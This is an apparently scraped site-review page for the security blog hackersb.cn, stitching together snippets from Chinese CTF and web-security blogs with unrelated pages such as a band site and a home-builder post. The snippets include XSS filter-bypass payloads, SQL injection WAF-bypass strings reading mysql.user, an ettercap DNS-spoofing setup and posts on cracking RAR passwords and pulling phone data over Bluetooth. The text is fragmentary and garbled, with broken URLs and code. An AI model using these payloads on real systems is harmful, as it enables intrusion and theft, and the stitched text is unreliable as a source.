hackersb.cn
Striker's LOFTERStriker's LOFTER - 安全盒子(www.secbox.cn)创始人,Web安全/开发工程师。
http://www.hackersb.cn/
Striker's LOFTER - 安全盒子(www.secbox.cn)创始人,Web安全/开发工程师。
http://www.hackersb.cn/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Sunday
LOAD TIME
2.4 seconds
16x16
PAGES IN
THIS WEBSITE
0
SSL
EXTERNAL LINKS
88
SITE IP
54.248.125.234
LOAD TIME
2.422 sec
SCORE
6.2
Striker's LOFTER | hackersb.cn Reviews
https://hackersb.cn
Striker's LOFTER - 安全盒子(www.secbox.cn)创始人,Web安全/开发工程师。
Mosuan's Blog
http://www.0aa.me/index.php/page/2
要求 注入出数据库版本 http:/ 123.xxx.xx.220/ctf4/xxxx web sql.php 参数是什么自己找,参数等于1-5都有数据。 参考 http:/ webcache.googleusercontent.com/search? Q=cache:CzRcrsZhiusJ:blog.portswigger.net/2015/11/xss-in-hidden-input-fields.html &cd=1&hl=zh-CN&ct=clnk&gl=tw http:/ www.w3school.co. 转自 http:/ www.cnblogs.com/martin1009/archive/2012/08/24/2653718.html Where 条件表达式格式为 $map['字段名'] = array('表达式', '操作条件'); 其中 $map 是一个普通的数组变量,可以根据自己需求而命名。 上述格式中的表达式实际是运算符的意义 补充说明 同 SQL 一样,ThinkPHP. 转自 http:/ py4.me/blog/? 王松 Striker 666 牛逼 学到了。
一次出题经历之Input标签Xss(要求自动弹窗) - Mosuan's Blog
http://www.0aa.me/index.php/archives/82
Tips1:注意属性的顺序 2016.11.18 17:44. Tips2:图片 2016.11.18 17:55. J v & # ; formaction oninput onblur cookie document window data / / % alert confirm : , http ' src= . . / */. 这个正则可以用onerror以及autofocus来绕过,我印象里面我记得我写了,不知道咋没写.日了狗了.群里的@春天的春,晴天的晴 利用onerror绕过了,我朋友利用autofocus绕过了,郑凯用onclick不过不能自动弹窗,也怪我没把规则说详细,然后我周末把这两个关键词添加到正则里面了。 上面正则匹配,然后判断字符串是否大于50 or 等号是否大于2个 or 单引号是否大于一个,如果是的话就进入黑名单里面。 Http:/ zone.secevery.com/? 这个我在社区发过 http:/ zone.secevery.com/? 春天的春,晴天的晴的poc: image' src onerror=prompt`1` c.
分类 笔记 下的文章 - Mosuan's Blog
http://www.0aa.me/index.php/category/biji
Union select x,x 拦截. 尝试用union函数 union(select 1,2,3) 拦截. Union(%20select 1,2,3,4) 不拦截, 注意select前面有个空格. Union(%20select%201,(select%20user%20from%20mysql.user),3,4) p神说没有from就不算绕过,尝试用from注入被拦截。 Union(%20select%201,(select%20user%20from(mysql.user) ,3,4) 尝试把from换成函数,被拦截了。 Union(%20select%201,(select%20user%20from(%20mysql.user)%20limit%202,1),3,4) 注意from函数里面第一位就是空格. SecIcode在线编码工具(内测版) V1 - 赛克艾威. Http:/ zone.secevery.com/code/index.html 在线体验,需要什么功能或者有兴趣维护再或者有什么bug的随时私聊我。 Tips2:图片 2016.11.18 17:55. Http:/ zo...
一次出题经历之SQL注入(要求注射出数据库版本) - Mosuan's Blog
http://www.0aa.me/index.php/archives/80
Http:/ 123.xxx.xx.220/ctf4/xxxx web sql.php. Function reg replace($reg, $strs){ preg match($reg, $strs, $result); if(count($result) = 1){ $aa = preg replace($reg,' ,$strs); return reg replace($reg, $aa); }else{ return $strs; } }. Http:/ www.0aa.me/index.php/archives/38/ 看过我这篇文章应该就能想到了subtring,但是这里过滤了substring,但是可以用substr,一样的效果。 Undefined的poc: ' (substr(version()from(21) )! 创作,采用 知识共享署名 3.0. 王松 Striker 666 牛逼 学到了。
关于我 - Mosuan's Blog
http://www.0aa.me/index.php/start-page.html
北斗安全成员 https:/ secboom.com. 王松 Striker 666 牛逼 学到了。
分类 Python 下的文章 - Mosuan's Blog
http://www.0aa.me/index.php/category/python
Coding:utf-8 -*- #code by Mosuan #2016.09.30 import urlparse import urllib import sys def GetUrl(url, payload): urllist = urlparse.urlparse(url) if urllist.query! 生成没有参数的原url url host = %s:/ %s%s? Db user = root. Db pass = root. Db database = mscan. Db port = 3306. Db host = 127.0.0.1. 改成真实目录. 其实这里可以修改下来回来的mysql库里面的site.cfg文件,把路径改成你电脑的真实路径就可以了。 如 mysql config = /Applications/MAMP/Library/bin/mysql config 2017.01.09更新,如下图. Ruby -e $(curl -fsSL https:/ raw.github.com/mxcl/homebrew/go).
SecIcode在线编码工具 V1 - Mosuan's Blog
http://www.0aa.me/index.php/archives/86
SecIcode在线编码工具(内测版) V1 - 赛克艾威. Http:/ zone.secevery.com/code/index.html 在线体验,需要什么功能或者有兴趣维护再或者有什么bug的随时私聊我。 创作,采用 知识共享署名 3.0. January 9th, 2017 at 01:48 pm. 王松 Striker 666 牛逼 学到了。
逆向路由器固件之SQL注入 | xd_xd's blog
http://xdxd.love/2016/09/20/逆向路由器固件之SQL注入
發表於 Sep 20 2016. Rootfs git:(master) find . -name my cgi .cgi. Usr/bin/my cgi .cgi. Rootfs git:(master) file ./usr/bin/my cgi .cgi. Usr/bin/my cgi .cgi. Bit LSB executable, MIPS, MIPS-II version 1. SYSV), dynamically linked (uses shared libs), stripped. 查询 select level from user where user name 字符串,可以定位到do login函数。 Or level = ( select.
TOTAL LINKS TO THIS WEBSITE
88
HackErS..AuthORity
Learn hacking, computer basics and sql injection tutorials Download Hacking tools and ebooks and much more. Subscribe For Free Updates! We'll not spam mate! Become Our Fan on Social Sites! Saturday, 10 January 2015. HOW TO CRACK WINRAR FILE PASSWORD. This post will help to extract any password protected RAR File. Actually a computer needs a program which performs extraction, Mostly they don’t have built-in program or already installed version. If you dont have the RAR password to access in. Run the progr...
Autobots Hackers
Para quem gosta de ' adrenalina' . Aprenda a invadir computadores! Terça-feira, 20 de maio de 2008. Video aula de como congelar o MSN do seu amigo. Essa video aula foi feita por ' Autobots'. Não sou hacker, so manjo um pouco de informatica. Programa para roubar credito de outro celular. O Super Bluetooth Hack serve para você conseguir dados de outros celulares via bluetooth sem que a outra pessoa saiba. Uma vez conectado a um outro telefone através de Bluetooth você pode:. Ver a lista de contatos. Já não...
Be Hacker safe - Keep protected from Hackers
Be Hacker safe - Keep protected from Hackers. Be hacker safe - keep protect your id from hackers. Protect Your Website Against Hacking. Ways To Protect Your Website Against Hacking. Today in the age of affiliate marketing, more and more people are creating their own sites to market products. The most common type of hacking is the Cross site scripting also called as XSS. The second most common hacking technique is the Google hacking. Today most search engines provide lot of tools to webmasters to track an...
Hacker Says - quote by Alan J. Perlis
Or Fork for Theming. Best programming and hacker quotes. Ever. Curated by fellow hackers Jarmo Pertman. In computing, the mean time to failure keeps getting shorter. Alan J. Perlis. People who deal with bits should expect to get bitten. In programming, as in everything else, to be in error is to be reborn. Alan J. Perlis. A common mistake that people make when trying to design something completely foolproof is to underestimate the ingenuity of complete fools. Alan J. Perlis. What you’ve described, The bo...
Striker's LOFTER
安全盒子 www.secbox.cn 创始人,Web安全/开发工程师。 这个不用多说,建议购买linux,不要问我为啥不用win,因为linux逼格高. 安装步骤参考这里,写的很详细:http:/ lnmp.org/install.html. Team 安全盒子团队 www.secbox.cn. Sudo apt-get install ettercap. Sudo vim /etc/ettercap/etter.dns. Com A 192.168.1.1. Cn A 192.168.1.1. Site www.secbox.cn. 前言 注入点是jcms的一个注入点,然后进行注入获取密码以后,安全核心核心成员wefgod对密码进行了逆向 在此感谢wefgod大神 ,但是登陆后台提示密码错误,各种无解,最终发现注入点可以执行命令,自己鼓捣了很久无果,于是拉上草叔叔,就有了下文,非常精彩的一个过程。 Team 安全盒子团队 www.secbox.cn. 原文地址 http:/ hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html. 好久没有捅...
No One Knows Nothing | HackerSB
Choosing a Home Builder – What to Know. July 8, 2015. With a custom builder, it is important to remember that you own the property that the builder is going to be building on. With a typical home builder, the builder owns the property that the home is going on. One of the happiest days of your life is the day you decide to have a home built for yourself. Instead, you are choosing a home that will be unique to you and your family. Some other things to keep in mind with a contractor include:. A custom buil...
hackersball.com - This website is for sale! - hackersball Resources and Information.
The Hackers Band - St. Augustine Florida based acoustic band
Click Here to check out The Hackers' My Space. Who we are now. Gregg Chirico : Bass guitar, Vocals; Walt Kulwicki : Lead guitar, Rythum guitar, Vocals; Dave Besley : Rythum guitar, Vocals; Kurt Johnston: Pedal Steel, Guitar, Keyboards, Vocals; Frankie Urzetta : Drums , Vocals; Chris McVey : Guitar, Vocals. You can find us regularly the last Monday of every month at Hurricane Patty's (6-9 pm), And the second Wednesday of every Month at the Casa Marina at Jax Beach (6:30- 10 pm). We’re a bunch of guys that...
ITBANK 탄탄한 기술력으로 경쟁력을 완성한다!
真菌感染症にイトラコナゾール
